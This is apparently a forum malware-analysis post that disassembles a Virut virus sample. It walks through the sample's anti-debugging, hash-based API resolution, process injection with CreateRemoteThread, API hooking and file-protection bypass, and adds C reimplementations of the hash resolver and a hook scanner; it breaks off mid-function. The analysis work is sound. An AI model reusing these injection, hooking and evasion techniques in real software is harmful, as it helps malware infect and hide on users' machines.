A first look at Virut
This post was last edited by L4Nce on 2014-3-2 16:43. Sample MD5: F2C103B48634E56ACCFDEB140F33E991
This is a simple analysis of the Virut virus.
It does not cover every code path, only the path that actually ran in my virtual machine, so some stages may not have been analyzed.
The virus's length-disassembler engine is analyzed briefly; it turns out to be quite compact.
The mutation engine is only covered roughly; there is still a lot about it that I do not understand. My skills are limited.
This analysis was a learning exercise, so the report will contain errors and omissions.
I would appreciate corrections from more experienced readers.
Thanks to ximo for giving me the sample.
004010D2 56 push esi
004010D3- E9 82FD0000 jmp 1(no_jun.00410E5A
004010D8 008B F08A003C add byte ptr ds:,cl
In the sample the virus has replaced the original code here with a jump into its own code section, which is how it gains control.
00410DE7 8B1D E0634000 mov ebx,dword ptr ds:[<&KERNEL32.Get>; load the address of an imported kernel32 function
00410DED 8B6C24 20 mov ebp,dword ptr ss:
00410DF1 814424 20 7402F>add dword ptr ss:,0xFFFF02>
00410DF9 81E3 00F0FFFF and ebx,-0x1000 ; round down to a page boundary
00410DFF 803B 4D cmp byte ptr ds:,0x4D ; look for the 'M' of the DOS header
Obtaining the kernel32 base address is a key step in shellcode and in viruses. Here the address of an imported kernel32 function is rounded down to a page boundary and then walked backwards until the 'MZ' signature is found. This relies on every page between the function and the image header being mapped, which holds inside a single module image; note that the check looks at only two bytes, so a stray 'MZ' inside the image at a 0x100-aligned offset would yield a wrong base.
00410F03 /0F85 0A000000 jnz 1(no_jun.00410F13
00410F09 |807B 01 5A cmp byte ptr ds:,0x5A ; confirm the 'Z'
00410F0D |0F84 72000000 je 1(no_jun.00410F85
00410F13 \81C3 00FFFFFF add ebx,-0x100 ; step back 0x100 and keep scanning
00410F19^ E9 E1FEFFFF jmp 1(no_jun.00410DFF
Once the kernel32 base is known, two immediates are pushed and a routine is called that parses the PE export table to locate exported functions.
00410F25 8B43 3C mov eax,dword ptr ds: ; e_lfanew: offset of the PE header
00410F28 8B5418 78 mov edx,dword ptr ds:; DataDirectory[0].VirtualAddress (PE header + 0x78)
00410F2C 8D141A lea edx,dword ptr ds: ; the first data-directory entry is the export table
00410F2F EB 32 jmp short 1(no_jun.00410F63
0040D04E 41 inc ecx
0040D04F 3B4A 18 cmp ecx,dword ptr ds: ; index against NumberOfNames (export directory + 0x18)
0040D052 8D3C18 lea edi,dword ptr ds: ; pointer to the current export name
00410EDF 33C0 xor eax,eax
00410EE1 50 push eax
00410EE2 C1E0 04 shl eax,0x4 ; these three instructions are the core of the hash (h*16 - h = h*15)
00410EE5 870424 xchg dword ptr ss:,eax
00410EE8 290424 sub dword ptr ss:,eax
00410EEB^ EB 84 jmp short 1(no_jun.00410E71
00410E71 0FB607 movzx eax,byte ptr ds: ; fetch the next byte of the name
00410E74 290424 sub dword ptr ss:,eax ; subtract it from the running hash
00410E77 47 inc edi ; next character
00410E78 803F 00 cmp byte ptr ds:,0x0 ; NUL terminator?
00410E7B^ EB 8A jmp short 1(no_jun.00410E07
00410E0E 35 650B5414 xor eax,0x14540B65 ; XOR with a constant key
00410E13 3B4424 04 cmp eax,dword ptr ss: ; compare with the hash passed as argument
00410E17 0F85 4E010000 jnz 1(no_jun.00410F6B ; no match: continue with the next name
00410F71 25 FFFF0000 and eax,0xFFFF
00410F76 8B3487 mov esi,dword ptr ds:
00410F79 03F3 add esi,ebx ; AddressOfFunctions[ordinal] + base gives the real address
00410F7B C2 0400 retn 0x4
The two immediates pushed earlier each identify one function. The virus runs its mutation engine over the code that sets up these arguments, and the same mutation shows up again in later code.
The reason for hashing names is presumably space, a technique common in shellcode: almost every function name is longer than 4 bytes, while a 4-byte hash distinguishes the functions well enough. A side effect that matters to an analyst is that no API name appears in the binary, so string-based triage sees nothing; the hashes have to be matched by hashing the export lists of the relevant DLLs, taking the XOR constant at 00410E0E into account.
0040D091 52 push edx
0040D092 FF95 61020000 call dword ptr ss: ; kernel32.CreateEventA
0040D098 83C4 20 add esp,0x20
0040D09B C3 retn
An event object is created.
00410E22 6A 02 push 0x2
00410E24 6A FE push -0x2
00410E26 FFD6 call esi ; SetThreadAffinityMask
It then calls this function. I had not run into it before; the documentation says it sets a thread's affinity mask so that the thread only runs on a given CPU. Presumably this is for multi-core compatibility. The arguments here are hThread = -2 (the current-thread pseudo-handle that GetCurrentThread returns) and mask = 2, so the thread is pinned to one logical processor. That matters for the rdtsc checks that follow: the timestamp counter is per core, so the differences only mean something if the thread cannot migrate between the two readings.
0040D00E 68 C10F60D1 push 0xD1600FC1
0040D013 E8 0D3F0000 call 1(no_jun.00410F25
0040D018 E8 613F0000 call 1(no_jun.00410F7E ; resolve GetTickCount
It continues resolving functions and fetches GetTickCount, which typically serves one of two purposes: anti-debugging or a source of randomness.
00410F7E FFD6 call esi ; GetTickCount
00410ECF FFD6 call esi ; GetTickCount
00410ED1 3B0424 cmp eax,dword ptr ss: ; compare with the earlier tick value
00410ED4^ 0F84 F5FFFFFF je 1(no_jun.00410ECF ; spin while they are equal
Two tick values are compared; if GetTickCount has been tampered with to return a constant, this loop never ends. Note that GetTickCount only advances every 10 to 16 ms, so on a normal system the loop spins briefly and exits on the next tick, which also aligns the rdtsc measurement that follows to a tick boundary.
00410EA4 56 push esi
00410EA5 59 pop ecx
00410EA6 91 xchg eax,ecx
00410EA7 0F31 rdtsc
rdtsc is executed next; it reads the CPU's timestamp counter and serves a purpose similar to GetTickCount, but with cycle resolution.
00410E4D 52 push edx
00410E4E 50 push eax
00410E4F 51 push ecx
00410E50 E8 29010000 call 1(no_jun.00410F7E
After saving these values it runs the same sequence again.
00410E80 2B0C24 sub ecx,dword ptr ss:
00410E83 2B4424 04 sub eax,dword ptr ss:
00410E87 1B5424 08 sbb edx,dword ptr ss:
00410E8B 83C4 0C add esp,0xC
00410E8E^ E9 ECC1FFFF jmp 1(no_jun.0040D07F
It computes the elapsed time; under a debugger, especially when single-stepping, the elapsed time is far larger than during normal execution.
0040D000 3010 xor byte ptr ds:,dl
0040D002 6BD2 0D imul edx,edx,0xD
0040D005 40 inc eax
0040D006 49 dec ecx
0040D007 86F2 xchg dl,dh
0040D009 E9 103F0000 jmp 1(no_jun.00410F1E
Data decoding begins: a byte-wise XOR loop in which the key byte in dl is advanced after every byte (imul edx,edx,0xD and xchg dl,dh).
0040D0B3 C70424 AD50D0EE mov dword ptr ss:,0xEED050AD
0040D0BA E8 663E0000 call 1(no_jun.00410F25
0040D0BF 56 push esi
This is a mutated form of a push (mov dword ptr [esp],imm after the earlier push), again used to resolve an export, in this case GetProcAddress.
0040DBF3 AD lods dword ptr ds:
0040DBF4 51 push ecx
0040DBF5 56 push esi
0040DBF6 57 push edi
0040DBF7 83BD DA541B00 00 cmp dword ptr ss:,0x0
0040DBFE 74 08 je short 1(no_jun.0040DC08
0040DC00 3385 D6541B00 xor eax,dword ptr ss:
0040DC06 EB 06 jmp short 1(no_jun.0040DC0E
0040DC08 3385 9F101B00 xor eax,dword ptr ss:
0040DC0E 50 push eax
0040DC0F 89A5 DE541B00 mov dword ptr ss:,esp
0040DC15 83BD DA541B00 00 cmp dword ptr ss:,0x0
0040DC1C 74 08 je short 1(no_jun.0040DC26
0040DC1E FF95 DA541B00 call dword ptr ss:
0040DC24 EB 05 jmp short 1(no_jun.0040DC2B
0040DC26 E8 01F3FFFF call 1(no_jun.0040CF2C
0040DC2B 3BA5 DE541B00 cmp esp,dword ptr ss:
0040DC31 75 05 jnz short 1(no_jun.0040DC38
0040DC33 59 pop ecx
0040DC34 33C0 xor eax,eax
0040DC36 EB 3E jmp short 1(no_jun.0040DC76
0040DC38 8BC6 mov eax,esi
0040DC3A 8B53 3C mov edx,dword ptr ds:
0040DC3D 2BC3 sub eax,ebx
0040DC3F 2B441A 78 sub eax,dword ptr ds:
0040DC43 72 30 jb short 1(no_jun.0040DC75
0040DC45 2B441A 7C sub eax,dword ptr ds:
0040DC49 73 2A jnb short 1(no_jun.0040DC75
0040DC4B 83EC 40 sub esp,0x40
0040DC4E 8BFC mov edi,esp
0040DC50 AC lods byte ptr ds:
0040DC51 3C 2E cmp al,0x2E
0040DC53 74 03 je short 1(no_jun.0040DC58
0040DC55 AA stos byte ptr es:
0040DC56^ EB F8 jmp short 1(no_jun.0040DC50
0040DC58 B8 2E444C4C mov eax,0x4C4C442E
0040DC5D AB stos dword ptr es:
0040DC5E B0 00 mov al,0x0
0040DC60 AA stos byte ptr es:
0040DC61 54 push esp
0040DC62 FF95 24501B00 call dword ptr ss:
0040DC68 83C4 40 add esp,0x40
0040DC6B 56 push esi
0040DC6C 50 push eax
0040DC6D FF95 0C501B00 call dword ptr ss:
0040DC73 EB 01 jmp short 1(no_jun.0040DC76
0040DC75 96 xchg eax,esi
0040DC76 5F pop edi
0040DC77 5E pop esi
0040DC78 59 pop ecx
0040DC79 AB stos dword ptr es:
0040DC7A 49 dec ecx
This code resolves functions one after another and stores them in a table for the virus's own use: each slot holds an obfuscated hash, which is decoded and looked up through the export-walk routine; if that fails, the loop builds a "name.DLL" string, loads the library and falls back to GetProcAddress (0040DC4B-0040DC6D).
Here is a screenshot of the filled-in table:
The kernel32 portion is listed below; these functions give a preview of the virus's capabilities. Resolving them dynamically keeps sensitive ones such as CreateRemoteThread out of the import table, where a static scan would notice them.
004110DC 7C80B731 kernel32.GetModuleHandleA
004110E0 7C834D59 kernel32.lstrcatA
004110E4 7C810FC2 kernel32.lstrcatW
004110E8 7C80BB31 kernel32.lstrcmpiA
004110EC 7C80BAF4 kernel32.lstrcpyW
004110F0 7C80BE46 kernel32.lstrlenA
004110F4 7C809A99 kernel32.lstrlenW
004110F8 7C801A28 kernel32.CreateFileA
004110FC 7C8094EE kernel32.CreateFileMappingA
00411100 7C80236B kernel32.CreateProcessA
00411104 7C8104BC kernel32.CreateRemoteThread
00411108 7C8106C7 kernel32.CreateThread
0041110C 7C865B1F kernel32.CreateToolhelp32Snapshot
00411110 7C80C0E8 kernel32.ExitThread
00411114 7C80AC6E kernel32.FreeLibrary
00411118 7C8115CC kernel32.GetFileAttributesA
0041111C 7C810B07 kernel32.GetFileSize
00411120 7C831C35 kernel32.GetFileTime
00411124 7C80B55F kernel32.GetModuleFileNameA
00411128 7C814F7A kernel32.GetSystemDirectoryA
0041112C 7C861807 kernel32.GetTempFileNameA
00411130 7C835DE2 kernel32.GetTempPathA
00411134 7C80932E kernel32.GetTickCount
00411138 7C81126A kernel32.GetVersion
0041113C 7C812B6E kernel32.GetVersionExA
00411140 7C821B8D kernel32.GetVolumeInformationA
00411144 7C82134B kernel32.GetWindowsDirectoryA
00411148 7C80FDBD kernel32.GlobalAlloc
0041114C 7C801D7B kernel32.LoadLibraryA
00411150 7C80B995 kernel32.MapViewOfFile
00411154 7C8309D1 kernel32.OpenProcess
00411158 7C864DF5 kernel32.Process32First
0041115C 7C864F68 kernel32.Process32Next
00411160 7C801812 kernel32.ReadFile
00411164 7C83205E kernel32.SetEndOfFile
00411168 7C812812 kernel32.SetFileAttributesA
0041116C 7C810C1E kernel32.SetFilePointer
00411170 7C831CA8 kernel32.SetFileTime
00411174 7C82FA6A kernel32.SetThreadAffinityMask
00411178 7C802446 kernel32.Sleep
0041117C 7C80BA04 kernel32.UnmapViewOfFile
00411180 7C809AE1 kernel32.VirtualAlloc
00411184 7C810E17 kernel32.WriteFile
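The export walk and hash at 00410E71-00410F7B and the table-filling loop at 0040DBF3 that uses it, as an added example in C (my code, not the sample's). It works on a raw in-memory image buffer the way the virus does. The test image it builds is constructed: a minimal MZ/PE skeleton with an export directory of three names, not a loadable PE. The hash is my reading of the loop (h = h*15 - c per byte, then XOR 0x14540B65); the XOR key applied to the table slots and the module base address are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HASH_KEY 0x14540B65u        /* the constant XORed in at 00410E0E */
#define IMG_SIZE 0x400

/* My reading of 00410E71-00410EEB: per byte h = h*16 - h - c, i.e. h = h*15 - c;
 * the final XOR is what the compare at 00410E13 sees. Assumption, not verified. */
uint32_t virut_hash(const char *name) {
    uint32_t h = 0;
    for (; *name; name++) h = h * 15 - (uint8_t)*name;
    return h ^ HASH_KEY;
}

static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int k = 0; k < 4; k++) p[k] = (uint8_t)(v >> 8 * k); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Walk the export directory of an in-memory image (00410F25-00410F7B) and
 * return the RVA of the export whose hashed name equals `want`, or 0. */
uint32_t resolve_by_hash(const uint8_t *img, uint32_t want) {
    if (rd16(img) != 0x5A4D) return 0;                       /* 'MZ' */
    uint32_t pe = rd32(img + 0x3C);                          /* e_lfanew */
    if (rd32(img + pe) != 0x00004550) return 0;              /* 'PE\0\0' */
    uint32_t exp = rd32(img + pe + 0x78);                    /* DataDirectory[0].VirtualAddress */
    if (!exp) return 0;
    uint32_t nnames = rd32(img + exp + 0x18);
    uint32_t funcs = rd32(img + exp + 0x1C), names = rd32(img + exp + 0x20), ords = rd32(img + exp + 0x24);
    for (uint32_t i = 0; i < nnames; i++) {
        const char *nm = (const char *)img + rd32(img + names + 4 * i);
        if (virut_hash(nm) == want) {
            uint16_t ord = rd16(img + ords + 2 * i);         /* the `and eax,0xFFFF` at 00410F71 */
            return rd32(img + funcs + 4 * ord);
        }
    }
    return 0;
}

/* The fill loop at 0040DBF3: every slot holds hash ^ key; resolve each one and
 * overwrite the slot with base + RVA (0 on failure). Returns the miss count;
 * the real loop falls back to LoadLibrary/GetProcAddress on a miss. */
int fill_table(const uint8_t *img, uint32_t base, uint32_t key, uint32_t *slots, size_t n) {
    int missing = 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t rva = resolve_by_hash(img, slots[i] ^ key);
        slots[i] = rva ? base + rva : 0;
        missing += rva == 0;
    }
    return missing;
}

/* Constructed test image: MZ stub, PE header at 0x80, export directory at 0x200
 * with three names whose fake code RVAs are 0x1000, 0x1010, 0x1020. */
static const char *const k_names[] = { "CreateEventA", "GetTickCount", "SetThreadAffinityMask" };

void build_image(uint8_t *img) {
    memset(img, 0, IMG_SIZE);
    wr16(img, 0x5A4D);
    wr32(img + 0x3C, 0x80);
    wr32(img + 0x80, 0x00004550);
    wr32(img + 0x80 + 0x78, 0x200);
    wr32(img + 0x200 + 0x14, 3); wr32(img + 0x200 + 0x18, 3);   /* NumberOfFunctions, NumberOfNames */
    wr32(img + 0x200 + 0x1C, 0x240); wr32(img + 0x200 + 0x20, 0x250); wr32(img + 0x200 + 0x24, 0x260);
    uint32_t str = 0x280;
    for (uint32_t i = 0; i < 3; i++) {
        wr32(img + 0x240 + 4 * i, 0x1000 + 0x10 * i);            /* AddressOfFunctions[i] */
        wr32(img + 0x250 + 4 * i, str);                          /* AddressOfNames[i] */
        wr16(img + 0x260 + 2 * i, (uint16_t)i);                  /* AddressOfNameOrdinals[i] */
        strcpy((char *)img + str, k_names[i]);
        str += (uint32_t)strlen(k_names[i]) + 1;
    }
}

int main(void) {
    uint8_t img[IMG_SIZE];
    build_image(img);
    uint32_t key = 0xDEADBEEF;                                   /* assumed per-sample key */
    uint32_t slots[] = { virut_hash("GetTickCount") ^ key, virut_hash("CreateRemoteThread") ^ key };
    int miss = fill_table(img, 0x7C800000, key, slots, 2);
    for (int i = 0; i < 2; i++) printf("slot %d -> %08X\n", i, slots[i]);
    printf("%d unresolved\n", miss);
    return 0;
}
```

To recover the real sample's table, run `virut_hash` over the export names of the DLLs in the list above and match the results against the decoded slot values; a miss means the name lives in another DLL or the hash reading is wrong.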
0040DED0 6A 00 push 0x0
0040DED2 6A 18 push 0x18
0040DED4 8BD4 mov edx,esp
0040DED6 6A 00 push 0x0
0040DED8 68 00860000 push 0x8600
0040DEDD 8BCC mov ecx,esp
0040DEDF 6A 00 push 0x0
0040DEE1 8BC4 mov eax,esp
0040DEE3 6A 00 push 0x0
0040DEE5 68 00000008 push 0x8000000
0040DEEA 6A 40 push 0x40
0040DEEC 51 push ecx
0040DEED 52 push edx
0040DEEE 6A 0E push 0xE
0040DEF0 50 push eax
0040DEF1 FF95 E0501B00 call dword ptr ss: ; ZwCreateSection
A section named \BaseNamedObjects\cmvtVt is created; the name appears to be random. Reading the arguments off the stack: ZwCreateSection(&handle, DesiredAccess 0xE = SECTION_MAP_READ|SECTION_MAP_WRITE|SECTION_MAP_EXECUTE, &objattr (length 0x18), MaximumSize 0x8600, PAGE_EXECUTE_READWRITE (0x40), SEC_COMMIT (0x8000000), FileHandle NULL), i.e. a pagefile-backed RWX section.
0040D3BB 68 00460000 push 0x4600
0040D3C0 8BD4 mov edx,esp
0040D3C2 6A 00 push 0x0
0040D3C4 8BCC mov ecx,esp
0040D3C6 6A 04 push 0x4
0040D3C8 6A 00 push 0x0
0040D3CA 6A 02 push 0x2
0040D3CC 52 push edx
0040D3CD 6A 00 push 0x0
0040D3CF 68 00460000 push 0x4600
0040D3D4 6A 00 push 0x0
0040D3D6 51 push ecx
0040D3D7 6A FF push -0x1
0040D3D9 50 push eax
0040D3DA FF95 E8501B00 call dword ptr ss: ; ntdll.ZwMapViewOfSection
ZwMapViewOfSection maps the section into the current process (ProcessHandle -1) with CommitSize and ViewSize 0x4600, InheritDisposition ViewUnmap (2) and PAGE_READWRITE (4).
0040D519 B9 4D0F0000 mov ecx,0xF4D
0040D51E F3:A5 rep movs dword ptr es:,dword pt>
0040D520 8DB5 1C4F1B00 lea esi,dword ptr ss:
0040D526 B9 B9010000 mov ecx,0x1B9
0040D52B F3:A5 rep movs dword ptr es:,dword pt>
0040D52D FFE0 jmp eax
The code is copied into the view (0xF4D and then 0x1B9 dwords) and execution jumps into it.
009106BD /74 1A je short 009106D9
009106BF |8BC3 mov eax,ebx
009106C1 |2B85 241B1B00 sub eax,dword ptr ss:
009106C7 |72 10 jb short 009106D9
009106C9 |83F8 04 cmp eax,0x4
009106CC |73 0B jnb short 009106D9
009106CE |8A8428 281B1B00mov al,byte ptr ds:[eax+ebp+0x1B1B28>
009106D5 |46 inc esi
009106D6 |AA stos byte ptr es:
009106D7 |EB 01 jmp short 009106DA
009106D9 \A4 movs byte ptr es:,byte ptr ds:[>
009106DA 43 inc ebx
009106DB^ E2 CD loopd short 009106AA
009106DD FEC2 inc dl
009106DF 5E pop esi
009106E0 3A95 23171B00 cmp dl,byte ptr ss:
009106E6^ 72 9B jb short 00910683
Another code transfer. Note that the bytes being copied are the code just analyzed, so any software breakpoints (0xCC) left in them are copied too and the copy will crash or misbehave; use hardware breakpoints here.
0091051F E8 14010000 call 00910638
00910524 50 push eax
00910525 54 push esp
00910526 6A 20 push 0x20
00910528 6A FF push -0x1
0091052A FF95 F0501B00 call dword ptr ss: ; ZwOpenProcessToken
It opens the process token (ZwOpenProcessToken(-1, TOKEN_ADJUST_PRIVILEGES = 0x20, &token)) to raise privileges.
00910DC9 FF95 94501B00 call dword ptr ss: ; LoadLibraryA
00910DCF 8985 10501B00 mov dword ptr ss:,eax
00910DD5 E8 16000000 call 00910DF0
It then calls LoadLibraryA and resolves LookupPrivilegeValueA from the loaded module (advapi32).
00910F5C 56 push esi
00910F5D 33F6 xor esi,esi
00910F5F 6A 02 push 0x2
00910F61 56 push esi
00910F62 56 push esi
00910F63 8BD4 mov edx,esp
00910F65 6A 01 push 0x1
00910F67 52 push edx
00910F68 FF72 18 push dword ptr ds:
00910F6B 56 push esi
00910F6C FF95 14501B00 call dword ptr ss: ; advapi32.LookupPrivilegeValueA
00910F72 8BC4 mov eax,esp
It looks up the privilege's LUID; the privilege name (at [edx+0x18]) is not visible in this dump.
00910F6C FF95 14501B00 call dword ptr ss:
00910F72 8BC4 mov eax,esp
00910F74 56 push esi
00910F75 56 push esi
00910F76 56 push esi
00910F77 50 push eax
00910F78 56 push esi
00910F79 FF70 18 push dword ptr ds:
00910F7C FF95 D0501B00 call dword ptr ss: ; ntdll.ZwAdjustPrivilegesToken
00910556 FFB5 10501B00 push dword ptr ss:
0091055C FF95 5C501B00 call dword ptr ss:
00910562 57 push edi
00910563 FF95 04501B00 call dword ptr ss: ; kernel32.CloseHandle
This looks like the wrap-up of this stage: the module handle saved at 00910DCF is passed to a call (presumably FreeLibrary) and the token handle is closed.
00910563 FF95 04501B00 call dword ptr ss:
00910569 6A 00 push 0x0
0091056B 6A 02 push 0x2
0091056D FF95 54501B00 call dword ptr ss: ; kernel32.CreateToolhelp32Snapshot
A process snapshot is taken (CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS = 2, 0)).
00910578 97 xchg eax,edi
00910579 2BE1 sub esp,ecx
0091057B 890C24 mov dword ptr ss:,ecx
0091057E 54 push esp
0091057F 57 push edi
00910580 FF95 A0501B00 call dword ptr ss: ; kernel32.Process32First
Process32First fetches the first process entry (a PROCESSENTRY32 structure, not a handle).
00910586 33F6 xor esi,esi
00910588 83A5 50511B00 00 and dword ptr ss:,0x0
0091058F 54 push esp
00910590 57 push edi
00910591 FF95 A4501B00 call dword ptr ss: ; kernel32.Process32Next
00910597 85C0 test eax,eax
00910599 74 6E je short 00910609
0091059B 46 inc esi
0091059C 83FE 04 cmp esi,0x4
0091059F ^ 72 EE jb short 0091058F
The first four entries are skipped, i.e. the system processes at the head of the snapshot.
009105A5 6A 00 push 0x0
009105A7 6A 2A push 0x2A
009105A9 FF95 9C501B00 call dword ptr ss: ; kernel32.OpenProcess
009105AF 85C0 test eax,eax
00911050 51 push ecx
00911051 66:8B85 00501B00 mov ax,word ptr ss:
00911058 52 push edx
00911059 50 push eax
0091105A 8BC4 mov eax,esp
0091105C 51 push ecx
0091105D 51 push ecx
0091105E 6A 40 push 0x40
00911060 50 push eax
00911061 51 push ecx
00911062 6A 18 push 0x18
00911064 83C0 08 add eax,0x8
00911067 54 push esp
00911068 6A 0E push 0xE
0091106A 50 push eax
0091106B FF95 F4501B00 call dword ptr ss: ; ntdll.ZwOpenSection
00911097 6A 00 push 0x0
00911099 8BCC mov ecx,esp
0091109B 6A 40 push 0x40
0091109D 68 00001000 push 0x100000
009110A2 6A 02 push 0x2
009110A4 52 push edx
009110A5 6A 00 push 0x0
009110A7 68 00860000 push 0x8600
009110AC 6A 00 push 0x0
009110AE 51 push ecx
009110AF 53 push ebx
009110B0 50 push eax
009110B1 FF95 E8501B00 call dword ptr ss: ; ntdll.ZwMapViewOfSection
It opens the process (OpenProcess with 0x2A = PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE, exactly the rights that CreateRemoteThread and the memory writes below require), opens the section by name with the same 0xE access mask, and maps it into the target with ViewUnmap, MEM_TOP_DOWN (0x100000) and PAGE_EXECUTE_READWRITE (0x40).
00910F9C 51 push ecx
00910F9D 50 push eax
00910F9E 53 push ebx
00910F9F 6A 05 push 0x5
00910FA1 8BCC mov ecx,esp
00910FA3 50 push eax
00910FA4 8BD4 mov edx,esp
00910FA6 50 push eax
00910FA7 54 push esp
00910FA8 6A 40 push 0x40
00910FAA 51 push ecx
00910FAB 52 push edx
00910FAC 53 push ebx
00910FAD FF95 F8501B00 call dword ptr ss: ; ZwProtectVirtualMemory
00910FB3 83C4 0C add esp,0xC
00910FB6 FF95 08511B00 call dword ptr ss: ; ntdll.ZwWriteVirtualMemory
The arguments here are built through the mutation engine.
009110DB 8B85 D4501B00 mov eax,dword ptr ss:; ZwCreateFile
009110E1 8D8F 053E0000 lea ecx,dword ptr ds:
009110E7 E8 9DFEFFFF call 00910F89
009110EC 8B85 EC501B00 mov eax,dword ptr ss:; ZwOpenFile
009110F2 8D8F 8A3E0000 lea ecx,dword ptr ds:
009110F8 E8 8CFEFFFF call 00910F89
009110FD 8B85 D8501B00 mov eax,dword ptr ss:; ZwCreateProcess
00911103 8D8F 943E0000 lea ecx,dword ptr ds:
00911109 E8 7BFEFFFF call 00910F89
0091110E 8B85 DC501B00 mov eax,dword ptr ss:; ZwCreateProcessEx
00911114 85C0 test eax,eax
00911116 74 0B je short 00911123
00911118 8D8F A13E0000 lea ecx,dword ptr ds:
0091111E E8 66FEFFFF call 00910F89
00911123 8B85 E4501B00 mov eax,dword ptr ss:
00911129 85C0 test eax,eax
0091112B 74 0B je short 00911138
0091112D 8D8F AE3E0000 lea ecx,dword ptr ds:
00911133 E8 51FEFFFF call 00910F89
00911138 8B85 FC501B00 mov eax,dword ptr ss:; ZwQueryInformationProcess
0091113E 85C0 test eax,eax
00911140 74 0B je short 0091114D
These functions (ZwCreateFile, ZwOpenFile, ZwCreateProcess, ZwCreateProcessEx and ZwQueryInformationProcess) are hooked in the target process: 00910F89 is called with eax = the function's address and ecx = the hook body, makes the page writable with ZwProtectVirtualMemory and writes the detour with ZwWriteVirtualMemory. The ZwOpenFile hook is where the infection routine in the last part of this analysis is entered.
009105DE 50 push eax
009105DF 54 push esp
009105E0 50 push eax
009105E1 56 push esi
009105E2 51 push ecx
009105E3 50 push eax
009105E4 50 push eax
009105E5 53 push ebx
009105E6 FF95 4C501B00 call dword ptr ss: ; kernel32.CreateRemoteThread
009105EC 85C0 test eax,eax
It starts the remote thread.
--------------------------------------------------------------------------------
Now the remote-thread part. First attach OllyDbg to the target process.
Set breakpoints from the CreateRemoteThread arguments (start address and parameter).
7FF5191F 55 push ebp
7FF51920 E8 00000000 call 7FF51925
7FF51925 5D pop ebp
7FF51926 81ED 25291B00 sub ebp,0x1B2925
7FF5192C C685 23161B00 0>mov byte ptr ss:,0x0
7FF51933 83BD 1C501B00 0>cmp dword ptr ss:,0x0
7FF5193A 74 4E je short 7FF5198A
7FF5193C 6A 1E push 0x1E
7FF5193E 8BB5 1C501B00 mov esi,dword ptr ss:
7FF51944 59 pop ecx
7FF51945 AC lods byte ptr ds:
7FF51946 3C 2E cmp al,0x2E
Stepping into it.
7FF519B5 FF95 0C501B00 call dword ptr ss: ; GetProcAddress
7FF519BB 85C0 test eax,eax ; sfc.#2
7FF519BB 85C0 test eax,eax
7FF519BD 74 02 je short 7FF519C1
7FF519BF FFD0 call eax ; sfc.#2
7FF519C1 E8 0B000000 call 7FF519D1
It resolves sfc ordinal #2 and calls it.
7FF711F2 83C7 0F add edi,0xF
7FF711F5 57 push edi
7FF711F6 8BD4 mov edx,esp
7FF711F8 53 push ebx
7FF711F9 8BCC mov ecx,esp
7FF711FB 50 push eax
7FF711FC 54 push esp
7FF711FD 6A 40 push 0x40
7FF711FF 51 push ecx
7FF71200 52 push edx
7FF71201 6A FF push -0x1
7FF71203 FF95 F8501B00 call dword ptr ss: ; ntdll.ZwProtectVirtualMemory
It changes the page protection (ZwProtectVirtualMemory(-1, &addr, &size, PAGE_EXECUTE_READWRITE, &old)).
7FF71203 FF95 F8501B00 call dword ptr ss:
7FF71209 83C4 0C add esp,0xC
7FF7120C 8B95 58501B00 mov edx,dword ptr ss:
7FF71212 2BD7 sub edx,edi
7FF71214 83EA 07 sub edx,0x7
7FF71217 C707 6A00E800 mov dword ptr ds:,0xE8006A
7FF7121D 8957 03 mov dword ptr ds:,edx
7FF71220 C3 retn
Then it patches the code: 7 bytes are written at edi+0xF, `6A 00 E8 rel32` = `push 0 ; call <virus routine>`, with rel32 = target - (edi + 7) as computed at 7FF7120C-7FF71214. Given that the caller just obtained sfc ordinal #2, this presumably neutralizes a Windows protection mechanism (sfc.dll is the Windows File Protection client library).
Original: (screenshot not included)
After the patch: (screenshot not included)
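The patch shape written at 7FF71217-7FF7121D (`push 0 ; call rel32`), as an added example in C that is not the sample's code: one function encodes it exactly as the listing computes rel32, and one decodes it back, which is what a hook scanner does when an export's first bytes are not a normal prologue. The Zw* hooks installed at 00910F89 use the same ZwProtectVirtualMemory/ZwWriteVirtualMemory pair, but the page does not show their bytes, so the scanner only knows the three detour shapes below. All addresses, the module range and the "clean" prologue bytes are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 7FF71217-7FF7121D: mov dword [edi],0x00E8006A ; mov dword [edi+3],edx with
 * edx = target - edi - 7. Bytes: 6A 00 E8 <rel32> = push 0 ; call target, where
 * rel32 is relative to the end of the 5-byte call that starts at patch_addr+2. */
void encode_push0_call(uint8_t out[7], uint32_t patch_addr, uint32_t target) {
    uint32_t rel = target - (patch_addr + 7);
    out[0] = 0x6A; out[1] = 0x00; out[2] = 0xE8;
    for (int k = 0; k < 4; k++) out[3 + k] = (uint8_t)(rel >> 8 * k);
}

enum patch_kind { PATCH_NONE = 0, PATCH_JMP, PATCH_CALL, PATCH_PUSH0_CALL };

static int32_t rel32_at(const uint8_t *p) {
    return (int32_t)(p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24);
}

/* Recognise a detour at the start of a function: E9 rel32 (jmp), E8 rel32 (call),
 * or the 7-byte push0/call above. On a hit, *target is the absolute destination. */
enum patch_kind decode_patch(const uint8_t *code, size_t len, uint32_t code_addr, uint32_t *target) {
    if (len >= 5 && (code[0] == 0xE8 || code[0] == 0xE9)) {
        *target = code_addr + 5 + (uint32_t)rel32_at(code + 1);
        return code[0] == 0xE9 ? PATCH_JMP : PATCH_CALL;
    }
    if (len >= 7 && code[0] == 0x6A && code[1] == 0x00 && code[2] == 0xE8) {
        *target = code_addr + 7 + (uint32_t)rel32_at(code + 3);
        return PATCH_PUSH0_CALL;
    }
    return PATCH_NONE;
}

/* One monitored export: its address, the first bytes read from it, and the
 * address range of the module that legitimately owns it. */
struct export_probe { const char *name; uint32_t addr; uint8_t first[8]; uint32_t mod_lo, mod_hi; };

/* A hook scan: a detour whose destination lies outside the owning module is the
 * signal; a jump that stays inside the module (e.g. a hot-patch stub) is not. */
int count_hooked(const struct export_probe *ex, size_t n) {
    int hooked = 0;
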